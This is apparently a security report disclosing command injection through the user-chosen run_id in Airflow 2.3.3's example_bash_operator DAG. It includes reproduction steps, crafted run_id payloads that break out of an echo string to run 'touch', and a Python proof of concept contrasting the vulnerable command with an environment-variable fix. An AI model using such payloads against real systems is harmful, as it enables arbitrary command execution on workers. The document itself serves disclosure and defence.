airflow-2.3.3/airflow/example_dags/example_bash_operator.py has a command injection vulnerability.
The run_id is chosen by whoever triggers the DAG, and the following code (example_bash_operator.py) renders it straight into a BashOperator bash_command, so I can inject custom shell commands through it.
from airflow.operators.bash import BashOperator

# run_id is a templated value set by the triggering user; it is substituted
# verbatim into the shell command string, with no quoting or escaping.
also_run_this = BashOperator(
    task_id='also_run_this',
    bash_command='echo "run_id={{ run_id }} | dag_run={{ dag_run }}"',
)
Open the DAGs menu, pick the example_bash_operator DAG and select "Trigger DAG w/ config". Set the run_id to
" touch /tmp/success
"
(the line break is part of the value) and trigger the DAG.
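As an added worked example (not part of this report and not Airflow's own code): the script below renders the example DAG's bash_command the way Airflow's Jinja templating would, runs the result through bash -c as BashOperator does, and shows that a run_id crafted to close the echo string executes an attacker-chosen command, while a variant that hands run_id to the shell through an environment variable only prints it. The minimal render() function standing in for Jinja, the DagRun repr string, the two payload forms (my reading of the report's newline-based run_id, plus a one-line semicolon form of the same idea) and the hardened command are all assumptions of the example, not taken from Airflow.

```python
import os
import re
import subprocess
import tempfile

# bash_command template from airflow 2.3.3's example_bash_operator.py.
VULNERABLE_TEMPLATE = 'echo "run_id={{ run_id }} | dag_run={{ dag_run }}"'

# Hardened variant (a suggestion added here, not Airflow's own change): the
# values reach the shell through environment variables and are expanded inside
# double quotes, so quotes, newlines and semicolons in run_id are printed as
# characters instead of being parsed as shell syntax.
HARDENED_COMMAND = 'echo "run_id=$RUN_ID | dag_run=$DAG_RUN"'

# Constructed stand-in for the DagRun repr Airflow would render; the real
# repr also contains no double quotes, which is all that matters here.
DAG_RUN_REPR = "<DagRun example_bash_operator>"


def render(template, context):
    """Minimal stand-in for Airflow's Jinja rendering of templated fields:
    every {{ name }} is replaced by the context value verbatim."""
    return re.sub(r"\{\{\s*(\w+)\s*\}\}", lambda m: str(context[m.group(1)]), template)


def payloads(marker_path):
    """Two run_id values that break out of the echo string. 'newline' is our
    reading of the report's payload (quote, newline, command, newline, quote);
    'semicolon' is the same idea on a single line."""
    return {
        "newline": f'"\ntouch {marker_path}\n"',
        "semicolon": f'"; touch {marker_path}; echo "',
    }


def rendered_vulnerable_command(run_id):
    """What bash -c receives once the vulnerable template is rendered."""
    return render(VULNERABLE_TEMPLATE, {"run_id": run_id, "dag_run": DAG_RUN_REPR})


def run_vulnerable(run_id):
    """Execute the rendered command the way BashOperator does (bash -c)."""
    return subprocess.run(["bash", "-c", rendered_vulnerable_command(run_id)],
                          capture_output=True, text=True)


def run_hardened(run_id):
    """Same run_id, but delivered via the environment, never via the parser."""
    env = dict(os.environ, RUN_ID=run_id, DAG_RUN=DAG_RUN_REPR)
    return subprocess.run(["bash", "-c", HARDENED_COMMAND], env=env,
                          capture_output=True, text=True)


def demo(workdir=None):
    """Run each payload against both commands and report whether the marker
    file appeared, i.e. whether the injected 'touch' actually executed."""
    workdir = workdir or tempfile.mkdtemp(prefix="airflow-injection-")
    results = {}
    for name in ("newline", "semicolon"):
        marker = os.path.join(workdir, name)
        run_id = payloads(marker)[name]
        run_vulnerable(run_id)
        vulnerable_hit = os.path.exists(marker)
        if vulnerable_hit:
            os.remove(marker)
        hardened = run_hardened(run_id)
        results[name] = {
            "vulnerable_executed_touch": vulnerable_hit,
            "hardened_executed_touch": os.path.exists(marker),
            "hardened_stdout": hardened.stdout,
        }
    return results


if __name__ == "__main__":
    for name, r in demo().items():
        print(f"{name}: vulnerable ran touch={r['vulnerable_executed_touch']}, "
              f"hardened ran touch={r['hardened_executed_touch']}")
        print("hardened echoed:", repr(r["hardened_stdout"]))
```

Note that with the newline payload the third rendered line (`" | dag_run=...`) is not a valid command, so bash exits non-zero and Airflow would mark the task failed; the injected touch has already run by then, which is why checking for the marker file, not the task state, is the right test.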
{F2036322}
Impact: any user allowed to trigger this DAG can execute arbitrary OS commands on the Airflow worker that runs the task.